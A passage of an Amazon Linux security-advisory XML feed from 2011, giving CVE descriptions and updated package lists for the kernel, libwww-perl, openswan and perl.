</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1527" title="" id="CVE-2011-1527" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1379.html" title="" id="RHSA-2011:1379" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="krb5-devel" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-devel-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-server-ldap" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-ldap-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-server" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-server-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-pkinit-openssl-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-libs-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-workstation" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-workstation-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="9.19.amzn1" epoch="0" arch="i686"><filename>Packages/krb5-debuginfo-1.9-9.19.amzn1.i686.rpm</filename></package><package name="krb5-libs" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-libs-1.9-9.19.amzn1.x86_64.rpm</filename></package><package name="krb5-server" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-1.9-9.19.amzn1.x86_64.rpm</filename></package><package name="krb5-debuginfo" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-debuginfo-1.9-9.19.amzn1.x86_64.rpm</filename></package><package name="krb5-server-ldap" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-server-ldap-1.9-9.19.amzn1.x86_64.rpm</filename></package><package name="krb5-workstation" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-workstation-1.9-9.19.amzn1.x86_64.rpm</filename></package><package name="krb5-devel" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-devel-1.9-9.19.amzn1.x86_64.rpm</filename></package><package name="krb5-pkinit-openssl" version="1.9" release="9.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/krb5-pkinit-openssl-1.9-9.19.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-16</id><title>Amazon Linux - ALAS-2011-16: medium priority package update for kernel</title><issued date="2011-10-31 18:26:00" /><updated date="2014-09-14 14:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3191:
* A signedness issue was found in the Linux kernel's CIFS (Common Internet File System) implementation. A malicious CIFS server could send a specially-crafted response to a directory read request that would result in a denial of service or privilege escalation on a system that has a CIFS share mounted.
* A malicious CIFS (Common Internet File System) server could send a specially-crafted response to a directory read request that would result in a denial of service or privilege escalation on a system that has a CIFS share mounted.
CVE-2011-3188:
* The way IPv4 and IPv6 protocol sequence numbers and fragment IDs were generated could allow a man-in-the-middle attacker to inject packets and possibly hijack connections. Protocol sequence numbers and fragment IDs are now more random.
* IPv4 and IPv6 protocol sequence number and fragment ID generation could allow a man-in-the-middle attacker to inject packets and possibly hijack connections. Protocol sequence number and fragment IDs are now more random.
CVE-2011-2918:
* A flaw was found in the way the Linux kernel's Performance Events implementation handled PERF_COUNT_SW_CPU_CLOCK counter overflow. A local, unprivileged user could use this flaw to cause a denial of service.
CVE-2011-2723:
The skb_gro_header_slow function in include/linux/netdevice.h in the Linux kernel before 2.6.39.4, when Generic Receive Offload (GRO) is enabled, resets certain fields in incorrect situations, which allows remote attackers to cause a denial of service (system crash) via crafted network traffic.
* GRO (Generic Receive Offload) fields could be left in an inconsistent state. An attacker on the local network could use this flaw to cause a denial of service. GRO is enabled by default in all network drivers that support it.
* A flaw in skb_gro_header_slow() in the Linux kernel could lead to GRO (Generic Receive Offload) fields being left in an inconsistent state. An attacker on the local network could use this flaw to trigger a denial of service. GRO is enabled by default in all network drivers that support it.
CVE-2011-1833:
A race condition flaw was found in the way mount.ecryptfs_private checked the permissions of the directory to mount. A local attacker could use this flaw to mount (and then access) a directory they would otherwise not have access to. Note: The fix for this issue is incomplete until a kernel-space change is made. Future Red Hat Enterprise Linux 5 and 6 kernel updates will correct this issue.
* A race condition flaw was found in the Linux kernel's eCryptfs implementation. A local attacker could use the mount.ecryptfs_private utility to mount (and then access) a directory they would otherwise not have access to. Note: To correct this issue, the RHSA-2011:1241 ecryptfs-utils update, which provides the user-space part of the fix, must also be installed.
* A local attacker could use mount.ecryptfs_private to mount (and then access) a directory they would otherwise not have access to. Note: To correct this issue, the RHSA-2011:1241 ecryptfs-utils update must also be installed.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-1833" title="" id="CVE-2011-1833" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2723" title="" id="CVE-2011-2723" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2918" title="" id="CVE-2011-2918" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3188" title="" id="CVE-2011-3188" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3191" title="" id="CVE-2011-3191" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="kernel-doc" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-2.6.35.14-97.44.amzn1.noarch.rpm</filename></package><package name="perf" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/perf-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-2.6.35.14-97.44.amzn1.i686.rpm</filename></package><package name="kernel" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package><package name="perf" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="2.6.35.14" release="97.44.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-2.6.35.14-97.44.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-17</id><title>Amazon Linux - ALAS-2011-17: medium priority package update for perl-libwww-perl</title><issued date="2011-10-31 18:34:00" /><updated date="2014-09-14 14:40:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-0633:
The Net::HTTPS module in libwww-perl (LWP) before 6.00, as used in WWW::Mechanize, LWP::UserAgent, and other products, when running in environments that do not set the If-SSL-Cert-Subject header, does not enable full validation of SSL certificates by default, which allows remote attackers to spoof servers via man-in-the-middle (MITM) attacks involving hostnames that are not properly validated. NOTE: it could be argued that this is a design limitation of the Net::HTTPS API, and separate implementations should be independently assigned CVE identifiers for not working around this limitation. However, because this API was modified within LWP, a single CVE identifier has been assigned.
The Net::HTTPS module in libwww-perl (LWP) before 6.00, as used in WWW::Mechanize, LWP::UserAgent, and other products, when running in environments that do not set the If-SSL-Cert-Subject header, does not enable full validation of SSL certificates by default, which allows remote attackers to spoof servers via man-in-the-middle (MITM) attacks involving hostnames that are not properly validated. NOTE: it could be argued that this is a design limitation of the Net::HTTPS API, and separate implementations should be independently assigned CVE identifiers for not working around this limitation. However, because this API was modified within LWP, a single CVE identifier has been assigned.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0633" title="" id="CVE-2011-0633" type="cve" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="perl-libwww-perl" version="5.837" release="4.1.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-libwww-perl-5.837-4.1.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-18</id><title>Amazon Linux - ALAS-2011-18: medium priority package update for openswan</title><issued date="2011-11-09 21:34:00" /><updated date="2014-09-14 14:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-4073:
Use-after-free vulnerability in the cryptographic helper handler functionality in Openswan 2.3.0 through 2.6.36 allows remote authenticated users to cause a denial of service (pluto IKE daemon crash) via vectors related to the (1) quick_outI1_continue and (2) quick_outI1 functions.
A use-after-free flaw was found in the way Openswan's pluto IKE daemon used cryptographic helpers. A remote, authenticated attacker could send a specially-crafted IKE packet that would crash the pluto daemon. This issue only affected SMP (symmetric multiprocessing) systems that have the cryptographic helpers enabled. The helpers are disabled by default on Red Hat Enterprise Linux 5, but enabled by default on Red Hat Enterprise Linux 6.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-4073" title="" id="CVE-2011-4073" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1422.html" title="" id="RHSA-2011:1422" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="openswan" version="2.6.37" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-2.6.37-2.15.amzn1.i686.rpm</filename></package><package name="openswan-doc" version="2.6.37" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-doc-2.6.37-2.15.amzn1.i686.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="2.15.amzn1" epoch="0" arch="i686"><filename>Packages/openswan-debuginfo-2.6.37-2.15.amzn1.i686.rpm</filename></package><package name="openswan" version="2.6.37" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-2.6.37-2.15.amzn1.x86_64.rpm</filename></package><package name="openswan-doc" version="2.6.37" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-doc-2.6.37-2.15.amzn1.x86_64.rpm</filename></package><package name="openswan-debuginfo" version="2.6.37" release="2.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/openswan-debuginfo-2.6.37-2.15.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-19</id><title>Amazon Linux - ALAS-2011-19: medium priority package update for perl</title><issued date="2011-11-09 21:48:00" /><updated date="2014-09-14 14:41:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux that fix the following vulnerabilities:
CVE-2011-3597:
It was found that the "new" constructor of the Digest module used its argument as part of the string expression passed to the eval() function. An attacker could possibly use this flaw to execute arbitrary Perl code with the privileges of a Perl program that uses untrusted input as an argument to the constructor.
Eval injection in the Digest module before 1.17 for Perl allows context-dependent attackers to execute arbitrary commands via the new constructor.
CVE-2011-2939:
Off-by-one error in the decode_xs function in Unicode/Unicode.xs in the Encode module before 2.44, as used in Perl before 5.15.6, might allow context-dependent attackers to cause a denial of service (memory corruption) via a crafted Unicode string, which triggers a heap-based buffer overflow.
A heap-based buffer overflow flaw was found in the way Perl decoded Unicode strings. An attacker could create a malicious Unicode string that, when decoded by a Perl program, would cause the program to crash or, potentially, execute arbitrary code with the permissions of the user running the program.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-2939" title="" id="CVE-2011-2939" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3597" title="" id="CVE-2011-3597" type="cve" /><reference href="https://rhn.redhat.com/errata/RHSA-2011:1424.html" title="" id="RHSA-2011:1424" type="redhat" /></references><pkglist><collection short="amazon-linux"><name>Amazon Linux</name><package name="perl-Term-UI" version="0.20" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Term-UI-0.20-119.12.amzn1.i686.rpm</filename></package><package name="perl-suidperl" version="5.10.1" release="119.12.amzn1" epoch="4" arch="i686"><filename>Packages/perl-suidperl-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-Object-Accessor" version="0.34" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Object-Accessor-0.34-119.12.amzn1.i686.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Pod-Escapes-1.04-119.12.amzn1.i686.rpm</filename></package><package name="perl-Digest-SHA" version="5.47" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Digest-SHA-5.47-119.12.amzn1.i686.rpm</filename></package><package name="perl-CPAN" version="1.9402" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CPAN-1.9402-119.12.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-ParseXS" version="2.2003.0" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-ExtUtils-ParseXS-2.2003.0-119.12.amzn1.i686.rpm</filename></package><package name="perl-IO-Compress-Base" version="2.020" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-IO-Compress-Base-2.020-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-Build" version="0.3500" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Build-0.3500-119.12.amzn1.i686.rpm</filename></package><package name="perl-libs" version="5.10.1" release="119.12.amzn1" epoch="4" arch="i686"><filename>Packages/perl-libs-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-MakeMaker" version="6.55" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-ExtUtils-MakeMaker-6.55-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-Load" version="0.16" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Load-0.16-119.12.amzn1.i686.rpm</filename></package><package name="perl-Time-Piece" version="1.15" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Time-Piece-1.15-119.12.amzn1.i686.rpm</filename></package><package name="perl-devel" version="5.10.1" release="119.12.amzn1" epoch="4" arch="i686"><filename>Packages/perl-devel-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.27" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-ExtUtils-CBuilder-0.27-119.12.amzn1.i686.rpm</filename></package><package name="perl-Archive-Extract" version="0.38" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Archive-Extract-0.38-119.12.amzn1.i686.rpm</filename></package><package name="perl-core" version="5.10.1" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-core-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-File-Fetch" version="0.26" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-File-Fetch-0.26-119.12.amzn1.i686.rpm</filename></package><package name="perl-version" version="0.77" release="119.12.amzn1" epoch="3" arch="i686"><filename>Packages/perl-version-0.77-119.12.amzn1.i686.rpm</filename></package><package name="perl-Archive-Tar" version="1.58" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Archive-Tar-1.58-119.12.amzn1.i686.rpm</filename></package><package name="perl-Parse-CPAN-Meta" version="1.40" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Parse-CPAN-Meta-1.40-119.12.amzn1.i686.rpm</filename></package><package name="perl-Params-Check" version="0.26" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Params-Check-0.26-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-CoreList" version="2.18" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Module-CoreList-2.18-119.12.amzn1.i686.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.28" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-ExtUtils-Embed-1.28-119.12.amzn1.i686.rpm</filename></package><package name="perl-CPANPLUS" version="0.88" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CPANPLUS-0.88-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-Loaded" version="0.02" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Loaded-0.02-119.12.amzn1.i686.rpm</filename></package><package name="perl-Log-Message" version="0.02" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Log-Message-0.02-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-Pluggable" version="3.90" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Module-Pluggable-3.90-119.12.amzn1.i686.rpm</filename></package><package name="perl-Log-Message-Simple" version="0.04" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Log-Message-Simple-0.04-119.12.amzn1.i686.rpm</filename></package><package name="perl-Test-Harness" version="3.17" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Test-Harness-3.17-119.12.amzn1.i686.rpm</filename></package><package name="perl-IPC-Cmd" version="0.56" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-IPC-Cmd-0.56-119.12.amzn1.i686.rpm</filename></package><package name="perl-IO-Compress-Zlib" version="2.020" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-IO-Compress-Zlib-2.020-119.12.amzn1.i686.rpm</filename></package><package name="perl-parent" version="0.221" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-parent-0.221-119.12.amzn1.i686.rpm</filename></package><package name="perl-Compress-Zlib" version="2.020" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Compress-Zlib-2.020-119.12.amzn1.i686.rpm</filename></package><package name="perl-CGI" version="3.51" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-CGI-3.51-119.12.amzn1.i686.rpm</filename></package><package name="perl-IO-Zlib" version="1.09" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-IO-Zlib-1.09-119.12.amzn1.i686.rpm</filename></package><package name="perl-Test-Simple" version="0.92" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Test-Simple-0.92-119.12.amzn1.i686.rpm</filename></package><package name="perl-Compress-Raw-Zlib" version="2.023" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Compress-Raw-Zlib-2.023-119.12.amzn1.i686.rpm</filename></package><package name="perl-debuginfo" version="5.10.1" release="119.12.amzn1" epoch="4" arch="i686"><filename>Packages/perl-debuginfo-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-Module-Load-Conditional" version="0.30" release="119.12.amzn1" epoch="0" arch="i686"><filename>Packages/perl-Module-Load-Conditional-0.30-119.12.amzn1.i686.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Package-Constants-0.02-119.12.amzn1.i686.rpm</filename></package><package name="perl-Time-HiRes" version="1.9721" release="119.12.amzn1" epoch="4" arch="i686"><filename>Packages/perl-Time-HiRes-1.9721-119.12.amzn1.i686.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.18" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Locale-Maketext-Simple-0.18-119.12.amzn1.i686.rpm</filename></package><package name="perl" version="5.10.1" release="119.12.amzn1" epoch="4" arch="i686"><filename>Packages/perl-5.10.1-119.12.amzn1.i686.rpm</filename></package><package name="perl-Pod-Simple" version="3.13" release="119.12.amzn1" epoch="1" arch="i686"><filename>Packages/perl-Pod-Simple-3.13-119.12.amzn1.i686.rpm</filename></package><package name="perl-Time-HiRes" version="1.9721" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-Time-HiRes-1.9721-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Time-Piece" version="1.15" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Time-Piece-1.15-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Archive-Extract" version="0.38" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Archive-Extract-0.38-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-CPANPLUS" version="0.88" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-CPANPLUS-0.88-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-libs" version="5.10.1" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-libs-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-parent" version="0.221" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-parent-0.221-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-CBuilder" version="0.27" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-ExtUtils-CBuilder-0.27-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-Embed" version="1.28" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-ExtUtils-Embed-1.28-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Params-Check" version="0.26" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Params-Check-0.26-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Locale-Maketext-Simple" version="0.18" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Locale-Maketext-Simple-0.18-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-ParseXS" version="2.2003.0" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-ExtUtils-ParseXS-2.2003.0-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Archive-Tar" version="1.58" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Archive-Tar-1.58-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Pod-Escapes" version="1.04" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Pod-Escapes-1.04-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-devel" version="5.10.1" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-devel-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Object-Accessor" version="0.34" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Object-Accessor-0.34-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Log-Message" version="0.02" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Log-Message-0.02-119.12.amzn1.x86_64.rpm</filename></package><package name="perl" version="5.10.1" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-CoreList" version="2.18" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Module-CoreList-2.18-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Log-Message-Simple" version="0.04" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Log-Message-Simple-0.04-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Pod-Simple" version="3.13" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Pod-Simple-3.13-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Compress-Zlib" version="2.020" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Compress-Zlib-2.020-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Parse-CPAN-Meta" version="1.40" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Parse-CPAN-Meta-1.40-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Compress-Raw-Zlib" version="2.023" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Compress-Raw-Zlib-2.023-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-ExtUtils-MakeMaker" version="6.55" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-ExtUtils-MakeMaker-6.55-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Compress-Zlib" version="2.020" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-IO-Compress-Zlib-2.020-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Loaded" version="0.02" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Loaded-0.02-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Load-Conditional" version="0.30" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Module-Load-Conditional-0.30-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Compress-Base" version="2.020" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-IO-Compress-Base-2.020-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-CPAN" version="1.9402" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-CPAN-1.9402-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Pluggable" version="3.90" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Pluggable-3.90-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Digest-SHA" version="5.47" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Digest-SHA-5.47-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-File-Fetch" version="0.26" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-File-Fetch-0.26-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-CGI" version="3.51" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-CGI-3.51-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Test-Simple" version="0.92" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Test-Simple-0.92-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Build" version="0.3500" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Build-0.3500-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-version" version="0.77" release="119.12.amzn1" epoch="3" arch="x86_64"><filename>Packages/perl-version-0.77-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-debuginfo" version="5.10.1" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-debuginfo-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-suidperl" version="5.10.1" release="119.12.amzn1" epoch="4" arch="x86_64"><filename>Packages/perl-suidperl-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Package-Constants" version="0.02" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Package-Constants-0.02-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-IO-Zlib" version="1.09" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-IO-Zlib-1.09-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Term-UI" version="0.20" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Term-UI-0.20-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-core" version="5.10.1" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-core-5.10.1-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-IPC-Cmd" version="0.56" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-IPC-Cmd-0.56-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Test-Harness" version="3.17" release="119.12.amzn1" epoch="0" arch="x86_64"><filename>Packages/perl-Test-Harness-3.17-119.12.amzn1.x86_64.rpm</filename></package><package name="perl-Module-Load" version="0.16" release="119.12.amzn1" epoch="1" arch="x86_64"><filename>Packages/perl-Module-Load-0.16-119.12.amzn1.x86_64.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2011-20</id><title>Amazon Linux - ALAS-2011-20: important priority package update for freetype</title><issued date="2011-11-19 01:18:00" /><updated 